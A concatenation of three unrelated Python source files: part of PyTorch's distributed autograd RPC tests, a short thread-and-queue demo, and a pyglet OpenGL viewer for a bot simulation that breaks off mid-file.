assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
# Need atleast one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
# only have `num_current_backward_passes` and `num_autograd contexts`
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
def _nested_backward_accumulate_grads(self, t1, t2):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
)
loss = my_sum(ret)
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_nested_backward_accumulate_grads(self):
self._nested_backward_accumulate_grads(
torch.rand(3, 3, requires_grad=True),
torch.rand(3, 3, requires_grad=True)
)
@dist_init
def test_nested_backward_accumulate_grads_sparse(self):
self._nested_backward_accumulate_grads(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True)
)
def _multiple_backward(self, t1, t2):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2))
loss = my_sum(ret)
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_multiple_backward(self):
self._multiple_backward(
torch.rand(3, 3, requires_grad=True),
torch.rand(3, 3, requires_grad=True)
)
@dist_init
def test_multiple_backward_sparse(self):
self._multiple_backward(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True)
)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
class CudaDistAutogradTest(CommonDistAutogradTest):
def _gpu_simple(self, t1, t2):
my_sum(t1 + t2).backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
loss = my_sum(t3)
dist_autograd.backward(context_id, [loss])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
self._gpu_simple(
torch.rand(3, 3, requires_grad=True, device="cuda:0"),
torch.rand(3, 3, requires_grad=True, device="cuda:0")
)
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple_sparse(self):
self._gpu_simple(
build_sparse_tensor(requires_grad=True, device="cuda:0"),
build_sparse_tensor(requires_grad=True, device="cuda:0")
)
def _gpu_to_cpu_continuation(self, t1, t2):
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
loss = my_sum(t7)
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
self._gpu_to_cpu_continuation(
torch.rand(3, 3, requires_grad=True, device="cuda:0"),
torch.rand(3, 3, requires_grad=True)
)
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_sparse(self):
self._gpu_to_cpu_continuation(
build_sparse_tensor(requires_grad=True, device="cuda:0"),
build_sparse_tensor(requires_grad=True)
)
def _gpu_to_cpu_continuation_gpu_root(self, t1, t2):
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
loss = my_sum(t6)
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
self._gpu_to_cpu_continuation_gpu_root(
torch.rand(3, 3, requires_grad=True, device="cuda:0"),
torch.rand(3, 3, requires_grad=True)
)
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root_sparse(self):
self._gpu_to_cpu_continuation_gpu_root(
build_sparse_tensor(requires_grad=True, device="cuda:0"),
build_sparse_tensor(requires_grad=True)
)
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class WrapperModule(nn.Module):
def __init__(self, model, device):
super().__init__()
self.model = model.to(device)
def forward(self, *args):
return self.model(*args)
def gradients(self, ctx_id):
grads = dist_autograd.get_gradients(ctx_id)
return [grads[p] for p in self.model.parameters()]
class TensorPipeCudaDistAutogradTest(RpcAgentTestFixture):
def _device_maps_backward_pass(self, t1, t2):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
loss = my_sum(res)
dist_autograd.backward(context_id, [loss])
grads = dist_autograd.get_gradients(context_id)
if t1.is_sparse:
self.assertEqual(build_sparse_one_gradient(), grads[t1])
self.assertEqual(build_sparse_one_gradient(), grads[t2])
else:
self.assertEqual(torch.ones(10), grads[t1])
self.assertEqual(torch.ones(10), grads[t2])
self.assertEqual(t1.device, grads[t1].device)
self.assertEqual(t2.device, grads[t2].device)
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass(self):
self._device_maps_backward_pass(
torch.rand(10, requires_grad=True, device=self.rank),
torch.ones(10, requires_grad=True, device=self.rank)
)
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass_sparse(self):
self._device_maps_backward_pass(
build_sparse_tensor(requires_grad=True, device=self.rank),
build_sparse_tensor(requires_grad=True, device=self.rank)
)
class MyRemoteCompute(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, input):
input = input * 2.0
return input
class MyLocalCompute(torch.nn.Module):
def __init__(self, next_stage):
super().__init__()
self.next_stage = next_stage
def forward(self, input):
return self.next_stage.rpc_sync().forward(input)
def _dist_autograd_sync_streams(self, sparse):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
remote_compute = rpc.remote(dst, TensorPipeCudaDistAutogradTest.MyRemoteCompute)
local_compute = TensorPipeCudaDistAutogradTest.MyLocalCompute(remote_compute)
for _ in range(10):
if sparse:
input = build_sparse_tensor(requires_grad=True, device=self.rank)
else:
input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
# Run local autograd
result = input * 2.0
r = random.random()
loss = my_sum(result) * r
loss.backward()
# Run distributed autograd
with dist_autograd.context() as context_id:
result = local_compute(input)
loss = my_sum(result) * r
dist_autograd.backward(context_id, [loss])
# Compare grads.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(input.grad, grads[input])
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams(self):
self._dist_autograd_sync_streams(False)
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams_sparse(self):
self._dist_autograd_sync_streams(True)
def _gradients_synchronizations(self, x):
options = self.rpc_backend_options
for peer_rank in range(self.world_size):
options.set_device_map(worker_name(peer_rank), {self.rank: peer_rank})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# this is master
layers = [nn.Linear(2000, 2000) for _ in range(self.world_size - 1)]
local_layers = [l.to(0) for l in layers]
remote_layers = []
for rank in range(1, self.world_size):
remote_layers.append(rpc.remote(
worker_name(rank),
WrapperModule,
args=(layers[rank - 1], rank)
))
x = x.to(0)
# local iteration
local_model = nn.Sequential(*local_layers)
local_model(x).sum().backward()
# remote iteration
with dist_autograd.context() as context_id:
for remote_layer in remote_layers:
x = remote_layer.rpc_sync().forward(x)
dist_autograd.backward(context_id, [x.sum()])
futs = []
for remote_layer in remote_layers:
futs.append(remote_layer.rpc_async().gradients(context_id))
for i in range(len(futs)):
local_gradients = [p.grad for p in local_layers[i].parameters()]
for g1, g2 in zip(futs[i].wait(), local_gradients):
self.assertEqual(g1, g2)
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_gradients_synchronizations(self):
self._gradients_synchronizations(
torch.randn(5000, 2000)
)
@skip_if_lt_x_gpu(4)
def test_gradients_synchronizations_sparse(self):
self._gradients_synchronizations(
torch.randn(5000, 2000).to_sparse()
)
|
threads_queue.py | from queue import Queue
from threading import Thread
def worker(q, n):
while True:
item = q.get()
if item is None:
break
print(f"Processing data '{item}' from the queue #{n}")
q = Queue(5)
t1 = Thread(target=worker, args=(q, 1))
t2 = Thread(target=worker, args=(q, 2))
t1.start()
t2.start()
for i in range(50):
q.put(i) # blocks until queue has a space for a new item
q.put(None)
q.put(None)
t1.join()
t2.join()
|
gui.py | from world import *
from bot import Bot
import pyglet
from pyglet.gl import *
import numpy
from threading import Thread
class GUI:
GREEN_GRASS = numpy.array((0.20, 0.67, 0.13))
BROWN_GRASS = numpy.array((0.47, 0.35, 0.10))
SCROLL_SPEED = 5
ZOOM_SPEED = 1.05
def __init__(self, world, windowwidth, windowheight, x=0, y=0, z=None):
self.ww, self.wh = windowwidth, windowheight
self.x, self.y = x, y
self.dx, self.dy, self.dz = 0, 0, 1
self.world = world
self.botvalues = None
self.focus = None
self.focusclass = None
self.focussenses = None
self.focusactions = None
self.sense_label_cache = None
self.action_label_cache = None
self.z = z
if z is None:
self.resize(windowwidth, windowheight)
def resize(self, windowwidth, windowheight):
self.ww, self.wh = windowwidth, windowheight
worldxsize = World.TILE_SIZE * world.tileshape[0]
worldysize = World.TILE_SIZE * world.tileshape[1]
self.z = min(self.ww / worldxsize, self.wh / worldysize)
# Need to rebuild labels
self.sense_label_cache = None
self.action_label_cache = None
def update(self):
# Change dx, dy
self.x += self.dx
self.y += self.dy
# Change zoom
self.z *= self.dz
# Adjust center position: cx = x + ww/2*z ...
self.x += self.ww * (self.dz - 1) / (2 * self.z)
self.y += self.wh * (self.dz - 1) / (2 * self.z)
def draw_world(self):
tilepercs = world.get_tile_percs()
self.botvalues, fsense, fact = world.get_bot_values()
if fsense is not None:
ins, vis, dist = Bot.split_senses(fsense)
self.focussenses = (Bot.label_inputs(ins), vis, dist)
else:
self.focussenses = None
if fact is not None:
self.focusactions = Bot.label_actions(fact)
else:
self.focusactions = None
for i in range(self.world.tileshape[0]):
for j in range(self.world.tileshape[1]):
x = i * World.TILE_SIZE
y = j * World.TILE_SIZE
self._draw_tile(x, y, tilepercs[i,j])
for i in range(self.botvalues.shape[0]):
eid = self.botvalues[i,0]
if eid != self.focus:
self._draw_bot(self.botvalues[i,:])
else:
self._draw_bot(self.botvalues[i,:], focus=True,
focussenses=self.focussenses, focusactions=self.focusactions)
self._draw_debug(self.focussenses, self.focusactions)
if self.focussenses is None and self.focusactions is None:
for i in range(self.botvalues.shape[0]):
eid, ecls, ex, ey, ed, er, eg, eb = self.botvalues[i,:]
if ecls == self.focusclass:
self.focus = self.botvalues[i,0]
def _draw_tile(self, x, y, energyperc, size=World.TILE_SIZE):
r, g, b = (GUI.GREEN_GRASS - GUI.BROWN_GRASS) * energyperc + GUI.BROWN_GRASS
glLoadIdentity()
glTranslatef(self.z * (x - self.x), self.z * (y - self.y), 0.0)
glScalef(size * self.z, size * self.z, 1.0)
glColor4f(r, g, b, 1.0)
glBegin(GL_QUADS)
glVertex2f(0, 0)
glVertex2f(1, 0)
glVertex2f(1, 1)
glVertex2f(0, 1)
glEnd()
glColor4f(0, 0, 0, 1)
glBegin(GL_LINE_LOOP)
glVertex2f(0, 0)
glVertex2f(1, 0)
glVertex2f(1, 1)
glVertex2f(0, 1)
glEnd()
def _draw_bot(self, botinfo, size=World.ENTITY_SIZE, focus=False, focussenses=None, focusactions=None, drawvis=False):
eid, ecls, x, y, d, r, g, b = botinfo
glLoadIdentity()
glTranslatef(self.z * (x - self.x), self.z * (y - self.y), 0.0)
glScalef(self.z * size, self.z * size, 1.0)
glRotatef(d - 90.0, 0, 0, 1)
glColor4f(r, g, b, 1.0)
# Bot body
glBegin(GL_TRIANGLES)
glVertex2f(-0.3, -0.5, 0)
glVertex2f(0.3, -0.5, 0)
glVertex2f(0.0, 0.5, 0)
glEnd()
if focus or drawvis:
if focussenses is not None:
senses, vis, dist = focussenses
else:
senses, vis, dist = None, None, None
hasdist = dist is not None
hasvis = vis is not None
# Vision cones
vbins = Bot.VISION_BINS
vlow = -Bot.FOV
vhigh = Bot.FOV
binangle = (vhigh - vlow) / vbins
vdist = Bot.VIEW_DIST / size
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glColor4f(r, g, b, 0.25)
glBegin(GL_TRIANGLES)
for i in range(vbins):
angleindx = i
lowangle = binangle*angleindx + vlow
highangle = binangle*(angleindx+1) + vlow
# Add 90.0 since bot-drawings are vertical, not rightwards
lowx = vdist * numpy.cos(numpy.deg2rad(lowangle + 90.0)) * (dist[i] if hasdist else 1.0)
lowy = vdist * numpy.sin(numpy.deg2rad(lowangle + 90.0)) * (dist[i] if hasdist else 1.0)
highx = vdist * numpy.cos(numpy.deg2rad(highangle + 90.0)) * (dist[i] if hasdist else 1.0)
highy = vdist * numpy.sin(numpy.deg2rad(highangle + 90.0)) * (dist[i] if hasdist else 1.0)
if hasvis:
if vis[i] == 0:
glColor4f(0., 0., 0., 0.25)
elif vis[i] == -1:
glColor4f(1., 0., 0., 0.25)
elif vis[i] == 1:
glColor4f(0., 0., 1., 0.25)
glVertex2f(0, 0, 0)
glVertex2f(lowx, lowy, 0)
glVertex2f(highx, highy, 0)
glEnd()
glDisable(GL_BLEND)
if focus:
self._draw_circle(100)
def _draw_circle(self, npoints):
angl = (2.0*numpy.pi)/npoints
glColor4f(1.0, 0.0, 0.0, 1.0)
glBegin(GL_LINE_LOOP)
for i in range(npoints):
glVertex2f(numpy.cos(i*angl), numpy.sin(i*angl), 0)
glEnd()
def _draw_debug(self, senses, actions, font_size=12):
glLoadIdentity()
if senses is not None:
sense, vis, dist = senses
else:
sense, vis, dist = None, None, None
if sense is not None:
if self.sense_label_cache is None:
self.sense_label_cache = []
for i, k in enumerate(sorted(sense)):
label = pyglet.text.Label("",
font_name='Times New Roman', font_size=font_size,
x=10, y=self.wh - ((i+1) * (font_size + 5)),
color=[255, 255, 255, 255])
self.sense_label_cache.append(label)
for label, k in zip(self.sense_label_cache, sorted(sense)):
label.text = "{}:\t{:5.5f}".format(k, sense[k])
label.draw()
if actions is not None:
if self.action_label_cache is None:
self.action_label_cache = []
for i, k in enumerate(reversed(sorted(actions))):
label = pyglet.text.Label("",
font_name='Times New Roman', font_size=font_size,
x=10, y=(i+0.1)*(font_size + 5),
color=[255,255,255,255])
self.action_label_cache.append(label)
for label, k in zip(self.action_label_cache, reversed(sorted(actions))):
label.text = "{}:\t{:5.5f}".format(k, actions[k])
label.draw()
def add_translate(self,dx,dy):
self.dx += dx
self.dy += dy
def set_zoom(self, dz):
self.dz = dz
def selectnear(self, x, y):
mapx = (x/self.z) + self.x
mapy = (y/self.z) + self.y
closestd2 = sys.maxsize
for i in range(self.botvalues.shape[0]):
eid, ecls, ex, ey, ed, er, eg, eb = self.botvalues[i,:]
dist2 = (mapx - ex)**2 + (mapy - ey)**2
if dist2 < closestd2:
self.focus = int(eid)
closestd2 = dist2
self.focusclass = ecls
def get_focus(self):
return self.focus
# Python multithreading slows stuff down, probably mutex starving. Will swap to RLmutex
SINGLE_THREAD = True
if __name__ == "__main__":
world = make_model()
try:
world.startup()
world.update(1)
win = pyglet.window.Window(1750, 1750, resizable=True)
fps_display = pyglet.clock.ClockDisplay(format='%(fps).2f fps')
gui = GUI(world, win.width, win.height)
if not SINGLE_THREAD:
updatewithfocus = lambda world: update(world, getfocus=gui.get_focus)
t = Thread(target=update, args=(world,))
t.start()
else:
